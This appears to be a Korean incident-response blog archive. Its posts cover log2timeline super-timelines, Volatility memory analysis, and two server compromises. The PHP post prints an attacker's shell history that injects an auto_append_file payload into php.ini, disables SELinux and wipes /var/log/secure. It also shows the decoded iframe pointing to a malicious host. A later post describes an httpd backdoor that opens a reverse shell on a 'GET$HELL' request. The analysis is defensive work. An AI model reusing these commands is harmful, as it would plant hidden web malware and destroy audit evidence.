malwareL4B: 2012

2012/11/29

SuperTimeline using log2timeline-sift

사고조사시 중요한 정보 중 하나가 바로 타임라인입니다.
다만, 시스템 여기저기에 흩어져 있는 정보들을 하나하나 수집하면서 타임라인을 작성하는 것은 상당히 귀찮으면서도 혼란스럽습니다. (경험상...)
타임라인 작성에는 log2timeline이라는 툴을 추천해드리며 본 포스팅에서는 SANS SIFT에서 좀 더 보기 좋게(?) 수정한 log2timeline-sift를 소개해드릴까 합니다. 아울러 log2timeline-sift의 결과 파일을 가지고 분석을 위해 정렬을 하였는데 제가 원하는대로 정렬이 되지 않아 log2timeline-sift의 결과 파일을 수정하는 방법에 대해서 말씀드리고자 합니다.

Digital Forensics SIFT'ing: Cheating Timelines with log2timeline
http://computer-forensics.sans.org/blog/2011/12/16/digital-forensics-sifting-cheating-timelines-with-log2timeline

Digital Forensic SIFTing: Colorized Super Timeline Template for Log2timeline Output Files
http://computer-forensics.sans.org/blog/2012/01/25/digital-forensic-sifting-colorized-super-timeline-template-for-log2timeline-output-files

Spluk를 이용한 Supertimeline 작성에 관한 글도 있는데요..
원본과 함께 Forensic Insight 멤버인 도루묵군이 작성한 문서도 소개해드리겠습니다. ;)

Forensic timeline Splunking
http://kleinco.com.au/thoughts-events/item/forensic-timeline-splunking

Forensic Insight Weekly Seminar Slides - Supertimeline+Splunk by dorumugs
http://forensicinsight.org/archives/912

log2timeline을 통해 타임라인 작성시 다음과 같이 csv 파일로 결과를 확인하실 수 있습니다.

보시는 바와 같이 그닥 보기 좋은 형태는 아닙니다.
FileName 컬럼의 데이터들이 분리되어 표시되면 좋을텐데 한꺼번에 들어가 있는 점이나 날짜(Date)가 정렬이 귀찮은 형태로 되어 있습니다. (제가 엑셀 기술이 부족하여 그럴지도 모르겠지만요..)

아무튼 이런한 점을 SANS SIFT에 포함된 log2timeline-sift가 보완해주었습니다.
다음 그림은 log2timeline-sift를 통해 추출한 파일입니다.

다만, log2timeline-sift 실행시 다음과 같은 에러가 발생하였습니다.

root@SIFT-Workstation:/mnt/hgfs/E# log2timeline-sift -p 0 -i win2k3.dd

[LOG2TIMELINE-SIFT] MFT directly callable, no need for special parsing.

[PreProcessing] Unable to determine the default browser for user qwer

[PreProcessing] Unable to determine the default browser for user networkservice

[PreProcessing] Unable to determine the default browser for user hacker2

[PreProcessing] Unable to determine the default browser for user administrator

[PreProcessing] Unable to determine the default browser for user hacker

[PreProcessing] Unable to determine the default browser for user default user

[PreProcessing] Unable to determine the default browser for user malwarel4b

[PreProcessing] Unable to determine the default browser for user guest

[PreProcessing] Unable to determine the default browser for user localservice

[PreProcessing] Hostname is set to WIN2K3

Wide character in print at /usr/share/perl5/Log2t/PreProc/win_sysinfo.pm line 172.

[PreProcessing] The timezone according to registry is: (대한민국표준시) 대한민국 표준시

[PreProcessing] The timezone settings are NOT overwritten so the settings might have to be adjusted.

[PreProcessing] The default system browser is: : IEXPLORE.EXE ("C:\Program Files\Internet Explorer\iexplore.exe" -nohome)

Local timezone is: Asia/Seoul (KST)

Loading output module: csv

Wide character in print at /usr/bin/log2timeline-sift line 400.

Wide character in print at /usr/bin/log2timeline-sift line 400.

...(snip)...

해당 에러는 유니코드 처리시 발생되는 에러로 log2timeline-sift의 일부 코드를 수정하면 됩니다.

# create the timeline file // 이부분을 아래와 같이 수정

open( TF, '>' . $store_point . '/' . $file_name . '_bodyfile.txt' ) or die( 'Unable to create the bodyfile ' . $store_point . '/' . $file_name . '_bodyfile.txt, not enough ac cess rights?');

# create the timeline file // 이렇게...

my $ofile = $store_point . '/' . $file_name . '_bodyfile.txt';

open( TF, ">:utf8", $ofile) or die( 'Unable to create the bodyfile ' . $store_point . '/' . $file_name . '_bodyfile.txt, not enough access rights?');

log2timeline-sift의 결과 파일은 아래와 같은 형태를 띄고 있습니다.

root@SIFT-Workstation:/cases/timeline-output-folder# head win2k3_bodyfile.txt

date,time,timezone,MACB,source,sourcetype,type,user,host,short,desc,version,filename,inode,notes,format,extra

05/14/2009,19:43:54,KST,MACB,FILE,NTFS $MFT,$SI [MACB] time,-,WIN2K3,C:/$MFT,C:/$MFT,2,C:/$MFT,0, ,Log2t::input::mft,-

05/14/2009,19:43:54,KST,MACB,FILE,NTFS $MFT,$SI [MACB] time,-,WIN2K3,C:/$MFTMirr,C:/$MFTMirr,2,C:/$MFTMirr,1, ,Log2t::input::mft,-

05/14/2009,19:43:54,KST,MACB,FILE,NTFS $MFT,$SI [MACB] time,-,WIN2K3,C:/$LogFile,C:/$LogFile,2,C:/$LogFile,2, ,Log2t::input::mft,-

05/14/2009,19:43:54,KST,MACB,FILE,NTFS $MFT,$SI [MACB] time,-,WIN2K3,C:/$Volume,C:/$Volume,2,C:/$Volume,3, ,Log2t::input::mft,-

05/14/2009,19:43:54,KST,MACB,FILE,NTFS $MFT,$SI [MACB] time,-,WIN2K3,C:/$AttrDef,C:/$AttrDef,2,C:/$AttrDef,4, ,Log2t::input::mft,-

05/14/2009,19:43:54,KST,...B,FILE,NTFS $MFT,$SI [...B] time,-,WIN2K3,C:/.,C:/.,2,C:/.,5, ,Log2t::input::mft,-

04/17/2012,18:07:32,KST,.A..,FILE,NTFS $MFT,$SI [.A..] time,-,WIN2K3,C:/.,C:/.,2,C:/.,5, ,Log2t::input::mft,-

04/17/2012,15:13:02,KST,M.C.,FILE,NTFS $MFT,$SI [M.C.] time,-,WIN2K3,C:/.,C:/.,2,C:/.,5, ,Log2t::input::mft,-

05/14/2009,19:43:54,KST,MACB,FILE,NTFS $MFT,$SI [MACB] time,-,WIN2K3,C:/$Bitmap,C:/$Bitmap,2,C:/$Bitmap,6, ,Log2t::input::mft,-

여기서 한가지 더 해결해야 할 문제는 mm/dd/yyyy 형태의 날짜 형식을 yyyy-mm-dd로 변경하는 것이었습니다. 기본 형태인 mm/dd/yyyy를 가지고 정렬하였더니 시간순서가 원하는대로 나오지 않아 불편하여 변경하게 되었습니다. 방법은 아주 간단합니다.

# sed -n '1p' win2k3_bodyfile.txt > win2k3_bodyfile_convert.csv

# sed -n -e '/KST/ s/$[0-9]*$\/$[0-9]*$\/$[0-9]*$/\3-\1-\2/p;' win2k3_bodyfile.txt >> win2k3_bodyfile_convert.csv

포스팅 초반에 있는 두번째 링크의 Colorized Super Timeline Template를 적용하면 다음과 같이 알록달록하게 나오게 됩니다. (date, time으로 정렬하였습니다)

단순히 보여주기식의 알록달록함이 아니라는 것으 명심하시고 보셔야 합니다.
자칫 그냥 넘어가 버릴 수 있는 중요한 정보들에 대해서 색깔로 구분해서 놓치지 말라는 의미인 것이죠.

2012/09/25

Volatility 2.2 RC2 - Linux Profile 생성

몇일전 Volatility 2.2 RC2부터 Linux 메모리 덤프를 지원한다는 글을 접하게 되었습니다.

http://www.infosecisland.com/blogview/22406-Analyzing-the-Average-Coder-Rootkit-Bash-History-and-Elevated-Processes-with-Volatility.html

2.2 RC2부터 지원하는 내용은 아래 링크에서 확인하실 수 있으며

http://code.google.com/p/volatility/wiki/Release22

Linux 메모리 덤프를 분석하기 위해서는 profile을 만들어줘야 합니다.
(무식하게 첫번째 링크를 그냥 따라해 봤지만 역시나 안되더군요...혹시나 하는 마음에 -_-;;)

http://code.google.com/p/volatility/wiki/LinuxMemoryForensics

1. 필요한 패키지 설치

- dwarfdump
Debian/Ubuntu 계열에서 dwarfdump를 설치하시면 되고
OpenSuSE, Fedora 그리고 그 외 배포판에서는 libdwarf-tools를 설치하시면 됩니다.
- GCC/make
대부분 설치되어 있으실 것이고 Debian/Ubuntu 계열에서는 build-essential을 설치하시면 됩니다.
(build-essential을 꼭 설치해야 하는지 확인 안했습니다.)
- kernel-devel
커널 모듈 빌드를 위한 헤더 파일들이 필요합니다.

2. Volatility Source 다운로드

http://code.google.com/p/volatility/downloads/list

다운로드 하시면 됩니다. 또는 svn으로 받으셔도 됩니다.

# svn checkout http://volatility.googlecode.com/svn/trunk/ volatility-read-only

3. profile 생성

리눅스용 프로파일은 커널 데이터 구조와 디버그 심볼로 이루어진 압축 파일 형태로 만들면 됩니다.
이는 Volatility가 커널 데이터 구조와 디버그 심볼을 통해 필요한 정보를 찾고 해석하기 때문입니다.
앞으로 대부분의 리눅스 커널에 대한 프로파일을 제공한다고 하는데요...일단은 필요한거 만들어서 쓰랍니다.

- vtypes 생성

# cd volatility-2.2-rc2/tools/linux
# make
# head module.dwarf

vtypes 생성은 위 명령만 실행하면 됩니다만...
약간의 에러가 발생할 수 있으니 에러 메시지 잘 보시고 필요한 헤더 파일을 필요한 위치에 복사하시거나 링크를 걸면 됩니다.

테스트는 Ubuntu 11.10에서 했습니다.

- Symbols 가져오기

심볼은 System.map 파일 안에 있으며 /boot 디렉토리에 있습니다.

- profile 만들기

# cd volatility-2.2-rc2
# zip volatility/plugins/overlays/linux/LinuxUbuntu1110.zip tools/linux/module.dwarf /boot/System.map-3.0.0-20-generic
adding: tools/linux/module.dwarf (deflated 89%)
adding: boot/System.map-3.0.0-20-generic (deflated 74%)

리눅스용 프로파일은 make시 생성된 dwarf 파일과 심볼 정보를 가지고 있는 System.map 파일을 zip 파일 형태로 압축하면 됩니다.

root@LUCKYSTRIKE:/data/forensics/volatility-2.2-rc2# ls -l volatility/plugins/overlays/
total 732
-rw-r--r-- 1 demantos demantos 8527 2012-09-05 02:29 basic.py
-rw-r--r-- 1 root root 11703 2012-09-24 13:40 basic.pyc
-rw-r--r-- 1 demantos demantos 0 2012-06-04 03:04 __init__.py
-rw-r--r-- 1 root root 161 2012-09-24 13:40 __init__.pyc
drwxr-xr-x 2 demantos demantos 4096 2012-09-24 13:40 linux
-rw-r--r-- 1 demantos demantos 838 2012-09-05 02:19 native_types.py
-rw-r--r-- 1 root root 769 2012-09-24 13:40 native_types.pyc
-rw-r--r-- 1 root root 702084 2012-09-24 17:41 Ubuntu1110.zip
drwxr-xr-x 2 demantos demantos 4096 2012-09-24 13:40 windows

프로파일 생성 및 사용 가능 여부는 --info 옵션을 통해서 확인 가능합니다.

리눅스용 플러그인은 다음과 같이 linux_ 라는 명칭으로 시작되게끔 명명되어 있습니다.

덤프된 이미지를 통해 확인해 보았습니다. 덤프 이미지는 fmem을 통해 덤프한 이미지를 이용했습니다.

아직 많은 플러그인들을 지원하진 않지만 필요한 경우 유용하게 사용할 수 있지 않을까 생각됩니다.
1차적인 테스트는 끝났으니 실제 루트킷 설치나 침해서버를 만든 후 이미지 덤프해서 분석 해봐야겠습니다.

2012/05/14

Volatility를 이용한 Windows 2003 메모리 덤프 분석

요즘은 침해사고조사시 메모리 덤프를 뜨는 경우가 많습니다. 디스크 이미징에 비해 용량은 작지만 생각보다 많은 정보들을 가지고 있기 때문이죠.. 물론 침해사고 인지 후 시스템을 끄거나 재부팅을 하지 않을 상태여야만 많은 정보들을 획득할 수가 있습니다.

이런 메모리 덤프 이미지를 분석할때 가장 많이 쓰이는게 Volatility가 아닐까 생각됩니다.

그리고 현재 가장 많이 쓰이는 윈도우 서버는 Windows 2003 Server일 것이구요..

얼마전까지 Volatility에서 Windows 2003 메모리 덤프는 분석이 안된다...상용으로 구매해야 분석이 된다...라고 알고 있었습니다. (아직도 공부해야 할게 많다는 결론이...)

Volatility를 이용해서 덤프된 메모리를 분석하기 위해 명령 실행시 아래와 같은 메시지를 접하게 되었습니다.

root@LUCKYSTRIKE:/mem_dump# python /data/forensics/volatility_2.1_alpha/vol.py pslist -f memdump.mem

Volatile Systems Volatility Framework 2.1_alpha

No suitable address space mapping found

Tried to open image as:

WindowsHiberFileSpace32: No base Address Space

WindowsCrashDumpSpace32: No base Address Space

AMD64PagedMemory: No base Address Space

JKIA32PagedMemory: No base Address Space

IA32PagedMemoryPae: Module disabled

JKIA32PagedMemoryPae: No base Address Space

IA32PagedMemory: Module disabled

WindowsHiberFileSpace32: No xpress signature found

WindowsCrashDumpSpace32: Header signature invalid

AMD64PagedMemory: Incompatible profile WinXPSP2x86 selected

JKIA32PagedMemory: No valid DTB found

IA32PagedMemoryPae: Module disabled

JKIA32PagedMemoryPae: No valid DTB found

IA32PagedMemory: Module disabled

FileAddressSpace: Must be first Address Space

저와 같은 경험이 있으신 분들이 계실거라 생각됩니다. 덤프된 이미지를 제대로 인식하지 못해서 발생되는 현상입니다. 이런 경우 다음 절차를 통해 분석을 진행하실 수 있습니다.

먼저, Volatility의 imageinfo 플러그인으로 이미지 파일을 확인합니다.

root@LUCKYSTRIKE:/mem_dump# python /data/forensics/volatility_2.1_alpha/vol.py imageinfo -f memdump.mem

Volatile Systems Volatility Framework 2.1_alpha

Determining profile based on KDBG search...

Suggested Profile(s) : Win2003SP0x86, Win2003SP1x86, Win2003SP2x86

AS Layer1 : JKIA32PagedMemoryPae (Kernel AS)

AS Layer2 : FileAddressSpace (/mem_dump/memdump.mem)

PAE type : PAE

DTB : 0x3ad000

KDBG : 0x808943e0L

KPCR : 0xffdff000L

KUSER_SHARED_DATA : 0xffdf0000L

Image date and time : 2012-04-30 02:22:27 UTC+0000

Image local date and time : 2012-04-30 11:22:27 +0900

Number of Processors : 4

Image Type : Service Pack 2

Windows2003 SP2 x86버전의 메모리라고 이야기해줍니다.

--profile 옵션을 통해 다시 분석을 진행합니다.

root@LUCKYSTRIKE:/mem_dump# python /data/forensics/volatility_2.1_alpha/vol.py -f memdump.mem --profile=Win2003SP2x86 pslist

Volatile Systems Volatility Framework 2.1_alpha

Offset(V) Name PID PPID Thds Hnds Time

---------- -------------------- ------ ------ ------ ------ -------------------

0x89f889b0 System 4 0 83 3244 1970-01-01 00:00:00

0x89bfa100 smss.exe 300 4 3 19 2012-04-30 02:06:46

0x89bd3d88 csrss.exe 348 300 14 728 2012-04-30 02:06:48

0x89cb2bc8 winlogon.exe 376 300 20 489 2012-04-30 02:06:49

0x89c53450 services.exe 424 376 17 454 2012-04-30 02:06:50

0x89b865a8 lsass.exe 436 376 30 583 2012-04-30 02:06:51

0x89c52868 svchost.exe 588 424 6 101 2012-04-30 02:06:53

0x88a5d660 svchost.exe 672 424 11 264 2012-04-30 02:06:54

0x88a3fa20 svchost.exe 744 424 9 150 2012-04-30 02:06:54

0x88a37020 svchost.exe 760 424 12 147 2012-04-30 02:06:54

0x88a32978 svchost.exe 796 424 63 1078 2012-04-30 02:06:54

0x88a22458 spoolsv.exe 912 424 12 135 2012-04-30 02:06:55

0x88a118a8 msdtc.exe 936 424 15 183 2012-04-30 02:06:55

0x889fd6a0 acaas.exe 1076 424 29 467 2012-04-30 02:06:56

0x889f9418 v3clnsrv.exe 1088 424 3 70 2012-04-30 02:06:56

0x889ed500 acaegmgr.exe 1116 424 2 41 2012-04-30 02:06:57

0x889d3568 acais.exe 1136 424 9 94 2012-04-30 02:06:57

0x889d1d48 AhnSDsv.exe 1152 424 2 46 2012-04-30 02:06:57

0x889e9bc8 AYServiceNT.aye 1172 424 10 168 2012-04-30 02:06:57

0x889d7608 DuzonFileServer 1212 424 4 278 2012-04-30 02:07:02

0x8899c3c8 DuzonMessenger. 1296 424 2 1083 2012-04-30 02:07:05

0x888e6020 svchost.exe 1320 424 2 79 2012-04-30 02:07:05

0x888e1500 inetinfo.exe 1396 424 8 176 2012-04-30 02:07:06

0x888bf360 msftesql.exe 1456 424 6 412 2012-04-30 02:07:07

0x888b7708 sqlservr.exe 1492 424 47 570 2012-04-30 02:07:07

0x886c9020 msmdsrv.exe 1516 424 19 642 2012-04-30 02:07:07

0x886bd330 NeoBizMail_POP. 1560 424 11 208 2012-04-30 02:07:08

0x883f8d88 NeoBizMail_SMTP 1660 424 12 315 2012-04-30 02:07:08

0x883ced88 NeoBiz_Admin.ex 1700 424 6 127 2012-04-30 02:07:09

0x88388d88 svchost.exe 1840 424 2 52 2012-04-30 02:07:10

0x886b57a0 ReportingServic 1856 424 25 531 2012-04-30 02:07:10

0x88349020 sqlwriter.exe 1996 424 3 93 2012-04-30 02:07:12

0x88335770 wmiapsrv.exe 2140 424 6 182 2012-04-30 02:07:13

0x882c2020 svchost.exe 2316 424 15 167 2012-04-30 02:07:17

0x8820ed88 SQLAGENT90.EXE 2504 424 13 420 2012-04-30 02:07:22

0x88208b90 wmiprvse.exe 2548 588 5 177 2012-04-30 02:07:24

0x882b55e8 svchost.exe 2772 424 20 172 2012-04-30 02:07:36

0x8814a020 alg.exe 2960 424 5 94 2012-04-30 02:07:38

0x8812f020 explorer.exe 3116 3084 11 456 2012-04-30 02:07:40

0x888b3b18 ClamTray.exe 3476 3116 4 94 2012-04-30 02:07:54

0x88397d88 acasp.exe 3512 3116 9 225 2012-04-30 02:07:55

0x88385b80 AhnSD.exe 3536 3116 1 58 2012-04-30 02:07:55

0x88372790 ctfmon.exe 3568 3116 1 92 2012-04-30 02:07:56

0x882ae9d8 AYAgent.aye 3660 3532 10 184 2012-04-30 02:08:02

0x889dd020 svchost.exe 3956 424 17 238 2012-04-30 02:12:02

0x889ec2a0 afmain.exe 2740 3512 2 174 2012-04-30 02:13:37

0x880eeb60 wmiprvse.exe 1100 588 8 145 2012-04-30 02:19:24

0x89dd2020 conime.exe 3500 3324 2 61 2012-04-30 02:20:52

0x880ee658 FTK Imager.exe 3784 3116 9 335 2012-04-30 02:21:43

프로파일을 지정하니 프로세스 목록이 제대로 보입니다.

네트워크 커넥션도 확인해봤습니다.

root@LUCKYSTRIKE:/mem_dump# python /data/forensics/volatility_2.1_alpha/vol.py -f memdump.mem --profile=Win2003SP2x86 connscan

Volatile Systems Volatility Framework 2.1_alpha

Offset(P) Local Address Remote Address Pid

---------- ------------------------- ------------------------- ------

0x08136c68 127.0.0.1:1433 127.0.0.1:1056 1492

0x08136e38 127.0.0.1:1056 127.0.0.1:1433 1660

0x0815fa10 127.0.0.1:1057 127.0.0.1:1433 1660

0x08262e38 127.0.0.1:1433 127.0.0.1:1053 1492

0x0826d360 127.0.0.1:1050 127.0.0.1:1433 1856

0x08273ab8 127.0.0.1:1046 127.0.0.1:1433 1856

0x08273cc8 127.0.0.1:1433 127.0.0.1:1051 1492

0x08277e38 127.0.0.1:1047 127.0.0.1:1433 1560

0x08279008 127.0.0.1:1044 127.0.0.1:1433 1560

0x0827b680 127.0.0.1:1043 127.0.0.1:1433 1856

0x082d3a78 127.0.0.1:1053 127.0.0.1:1433 1560

0x08301440 127.0.0.1:1036 127.0.0.1:1433 1560

0x0830c818 127.0.0.1:1042 127.0.0.1:1433 1660

0x0832b270 127.0.0.1:1048 127.0.0.1:1433 1660

0x0832b648 127.0.0.1:1045 127.0.0.1:1433 1660

0x08356da0 127.0.0.1:1039 127.0.0.1:1433 1660

0x08370c30 127.0.0.1:1035 127.0.0.1:1433 1660

0x08395e38 127.0.0.1:1433 127.0.0.1:1055 1492

0x0839f900 127.0.0.1:1055 127.0.0.1:1433 1660

0x088e27b8 127.0.0.1:1433 127.0.0.1:1057 1492

0x089cd380 0.0.0.0:1061 211.233.80.46:80 808

0x09ccd5c8 0.0.0.0:0 0.0.0.0:0 0

Windows 2003 서버의 모메리 분석 전에 imageinfo 플러그인으로 꼭 확인하셔야하며 이미지 정보 확인 후 Volatility 명령 실행시에도 --profile 옵션을 주셔서 명령을 실행하셔야 합니다. 모든 플러그인을 확인해보진 않았지만 일부 플러그인은 --profile 옵션을 주지 않아도 실행이 되지만 일부 플러그인은 실행이 되지 않았습니다.

간단하게 프로세스 관련 플러그인과 네트워크 관련 플러그인 확인해보니 네트워크 관련 플러그인(sockscan, connections, connscan 등)은 --profile 옵션 없이 명령이 잘 실행되었지만 프로세스 관련 플러그인(pslist, pstree 등)은 --profile 옵션 없이 명령이 실행되지 않았습니다.

대부분 스크립트 작성해서 하실테니 --profile 옵션을 사용하시는게 그리 불편하진 않으실겁니다.

스크립트 작성시에는 아래 SANS의 Memory Forensics Cheat Sheet을 활용하시면 되겠습니다.

http://blogs.sans.org/computer-forensics/files/2012/04/Memory-Forensics-Cheat-Sheet-v1.pdf

물론 -h 옵션을 통해 확인되는 플러그인들을 하나씩 모두 테스트해보셔서 분석시 자신이 필요한 플러그인을 찾아내시는 것도 좋은 방법이라 생각됩니다.

thanks to n0fate ;-)

2012/04/29

PHP auto_append_file을 이용한 악성 스크립트 삽입 공격

PHP 설정 파일인 php.ini를 보면 다음과 같은 항목들이 있습니다.

; Automatically add files before PHP document.
; http://php.net/auto-prepend-file
auto_prepend_file =
; Automatically add files after PHP document.
; http://php.net/auto-append-file
auto_append_file =

php 엔진이 파싱을 하는 파일(보통 .php 파일) 호출시 자동으로 추가할 파일을 지정하는 옵션입니다.

악성스크립트가 삽입되 확인해보니 삽입된 걸로 확인된 파일에는 정작 스크립트가 없었습니다.

한참을 헤매다가 .bash_history에서 다음과 같은 내용을 찾았습니다.

sed -i "/auto_append_file/d" php.ini
sed -i "s/; Language/\nauto_append_file = \/var\/local\/phplock.pid\n; Language/" php.ini
touch -r /etc/hosts php.ini
echo -e "\x0A\x3C\x3F\x69\x66\x28\x73\x74\x72\x73\x74\x72\x28\x24\x5F\x53\x45\x52\x56\x45\x52\x5B\x27......\x6B\x37\x66\x51\x3D\x3D\x22\x29\x3B\x7D\x20\x3F\x3E\x0A" > /var/local/phplock.pid
chmod 644 /var/local/phplock.pid
setenforce 0
/home/www/bin/apachectl restart
cat /dev/null > /var/log/secure

sed를 이용해서 auto_append_file 옵션을 지운 후에 다시 추가하고 있습니다.
/var/local/phplock.pid 파일에는 추가한 내용은 악성스크립트 URL을 난독화한 내용이었습니다.
난독화된 내용을 풀어보면 다음과 같습니다.

<iframe src=http://www.richfs.com/as/qvx.html width=111 height=1 frameborder=0</iframe>

현재 해당 파일에는 접근이 되지 않고 있습니다.

아래는 auto_append_file과 auto_prepend_file에 대한 테스트 결과입니다.

php.ini 파일의 무결성을 검사하는 스크립트를 만들어서 변경시 확인할 수 있도록 해야할 듯 합니다.
일반적으로 php.ini는 한번 설정하면 거의 바꾸지 않는걸로 알고 있습니다만
만약 수정을 한다해도 관리자가 수행하는 것이기 때문에 파일 내용에 변경이 발생하면
어떤 내용이 바뀌었는지 확인할 수 있는 스크립트를 만들어서 확인하는 것이 좋겠습니다.

2012/04/25

백도어가 숨겨진 HTTPD 발견

최근 사고조사 과정에서 다른 서버들과 httpd 데몬 파일의 사이즈가 다른게 있다면서 분석을 요청해 왔습니다. 다른 서버에 존재하는 httpd 파일의 사이즈를 확인은 못했지만 사이즈가 다른것보다 약간(?) 컸습니다. 제가 자기고 있는 리눅스에서는 1.2M와 1.4M인데 변조된 httpd는 무려 두배의 사이즈를 갖는 2.87M였습니다. 물론 사이즈만으로 악성이냐 아니냐를 판단할 수 없지만 일단 의심스러워 보였습니다.

httpd 파일을 까보니 정상적인 아파치 기능들이 모두 있는 것으로 보아 정상 소스코드에 백도어를 심고 재컴파일을 한 것으로 추정됩니다. 분석 당시에 변조된 소스코드가 존재하지 않았지만 메모리 덤프에서 /var/tmp/aa와 /var/tmp/.bb 라는 디렉토리에 다른 변조 파일과 루트킷 경로가 있는 것으로 보아 이 디렉토리에 소스코드를 푼 후 재컴파일한 것으로 보입니다.

[변조된 httpd의 기능]

1. URL에 GET$HELL을 입력할 경우 /bin/sh가 실행되면서 Reverse Connection 생성

http://victimhost/GET$HELL 이런식으로 말이죠...

물론 웹브라우저에서 하면 리버스쉘 연결 안됩니다.

telnet을 이용해서 접속했었습니다.

해당 기능은 _shell 함수에 구현되어 있었으며 ap_read_request 함수에 의해 호출되고 있었습니다.